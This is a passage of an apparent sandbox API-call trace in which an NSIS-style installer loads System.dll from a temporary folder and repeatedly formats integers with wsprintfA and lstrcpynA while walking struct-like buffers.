lpString1="720") returned="720" [0158.056] lstrlenA (lpString="720") returned 3 [0158.056] lstrcpynA (in: lpString1=0x40ac18, lpString2="720", iMaxLength=1024 | out: lpString1="720") returned="720" [0158.056] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.056] lstrcmpiA (lpString1="720", lpString2="0") returned 1 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3316480", iMaxLength=1024 | out: lpString1="3316480") returned="3316480" [0158.056] lstrlenA (lpString="3316480") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="720", iMaxLength=1024 | out: lpString1="720") returned="720" [0158.056] lstrlenA (lpString="720") returned 3 [0158.056] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3317200") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.056] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.056] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.056] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.057] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | 
out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3317200", iMaxLength=1024 | out: lpString1="3317200") returned="3317200" [0158.057] lstrlenA (lpString="3317200") returned 7 [0158.057] lstrcpynA (in: lpString1=0x336d34, lpString2="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.057] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.057] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.057] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.057] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.057] lstrcpyA (in: lpString1=0x321ba8, 
lpString2="3317200" | out: lpString1="3317200") returned="3317200" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.058] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="716") returned 3 [0158.059] lstrcpyA (in: lpString1=0x430800, lpString2="716" | out: lpString1="716") returned="716" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1616") returned 4 [0158.059] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3317200") returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.059] lstrlenA (lpString="1224") returned 4 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="716", iMaxLength=1024 | out: lpString1="716") returned="716" [0158.059] lstrlenA (lpString="716") returned 3 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrlenA (lpString="1616") returned 4 [0158.059] lstrcpynA (in: lpString1=0x40ac18, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.059] lstrcmpiA (lpString1="1616", lpString2="0") returned 1 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3317200", iMaxLength=1024 | out: lpString1="3317200") returned="3317200" [0158.059] lstrlenA (lpString="3317200") returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrlenA (lpString="1616") returned 4 [0158.059] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3318816") 
returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.060] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.060] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.060] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.060] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3318816", iMaxLength=1024 | out: lpString1="3318816") returned="3318816" [0158.060] lstrlenA (lpString="3318816") returned 7 [0158.060] lstrcpynA (in: lpString1=0x336d34, lpString2="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", 
iMaxLength=1024 | out: lpString1="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3318816(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.060] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpyA (in: lpString1=0x321ba8, lpString2="3318816" | out: lpString1="3318816") returned="3318816" [0158.060] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.060] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.060] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="828") returned 3 [0158.061] lstrcpyA (in: lpString1=0x430800, lpString2="828" | out: lpString1="828") returned="828" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.061] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3318816") returned 7 [0158.061] 
wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3320304") returned 7 [0158.061] lstrcpyA (in: lpString1=0x321ba8, lpString2="3320304" | out: lpString1="3320304") returned="3320304" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.061] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.061] lstrcpyA (in: lpString1=0x430800, lpString2="872" | out: lpString1="872") returned="872" [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.061] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2192") returned 4 [0158.062] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3320304") returned 7 [0158.062] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3322496") returned 7 [0158.062] lstrcpyA (in: lpString1=0x321ba8, lpString2="3322496" | out: lpString1="3322496") returned="3322496" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="716") returned 3 [0158.062] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.062] wsprintfA (in: 
param_1=0x336d30, param_2="%d" | out: param_1="932") returned 3 [0158.062] lstrcpyA (in: lpString1=0x430800, lpString2="932" | out: lpString1="932") returned="932" [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.062] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="656") returned 3 [0158.062] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3322496") returned 7 [0158.063] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3323152") returned 7 [0158.063] lstrcpyA (in: lpString1=0x321ba8, lpString2="3323152" | out: lpString1="3323152") returned="3323152" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.063] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1008") returned 4 [0158.063] lstrcpyA (in: lpString1=0x430800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") 
returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1104") returned 4 [0158.063] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.063] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3323152") returned 7 [0158.063] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3324256") returned 7 [0158.063] lstrcpyA (in: lpString1=0x321ba8, lpString2="3324256" | out: lpString1="3324256") returned="3324256" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.064] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="536") returned 3 [0158.064] lstrcpyA (in: lpString1=0x430800, lpString2="536" | out: lpString1="536") returned="536" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | 
out: param_1="0") returned 1 [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1232") returned 4 [0158.064] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3324256") returned 7 [0158.064] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3325488") returned 7 [0158.064] lstrcpyA (in: lpString1=0x321ba8, lpString2="3325488" | out: lpString1="3325488") returned="3325488" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.064] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1040") returned 4 [0158.064] lstrcpyA (in: lpString1=0x430800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.064] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1040") returned 4 [0158.065] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3325488") returned 7 [0158.065] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3326528") returned 7 
[0158.065] lstrcpyA (in: lpString1=0x321ba8, lpString2="3326528" | out: lpString1="3326528") returned="3326528" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.065] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1068") returned 4 [0158.065] lstrcpyA (in: lpString1=0x430800, lpString2="1068" | out: lpString1="1068") returned="1068" [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.065] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.066] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3326528") returned 7 [0158.066] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3328016") returned 7 [0158.066] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328016" | out: lpString1="3328016") returned="3328016" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.066] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1564") returned 4 [0158.066] lstrcpyA (in: 
lpString1=0x430800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="856") returned 3 [0158.066] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.066] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3328016") returned 7 [0158.066] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3328872") returned 7 [0158.067] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328872" | out: lpString1="3328872") returned="3328872" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1632") returned 4 [0158.067] lstrcpyA (in: lpString1=0x430800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") 
returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3328872") returned 7 [0158.067] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3329400") returned 7 [0158.067] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329400" | out: lpString1="3329400") returned="3329400" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="828") returned 3 [0158.067] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.067] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1648") returned 4 [0158.068] lstrcpyA (in: lpString1=0x430800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | 
out: param_1="584") returned 3 [0158.068] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3329400") returned 7 [0158.068] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3329984") returned 7 [0158.068] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329984" | out: lpString1="3329984") returned="3329984" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1624") returned 4 [0158.068] lstrcpyA (in: lpString1=0x431800, lpString2="1624" | out: lpString1="1624") returned="1624" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.068] lstrcpyA (in: lpString1=0x430800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.068] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2136") returned 4 [0158.069] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3329984") returned 7 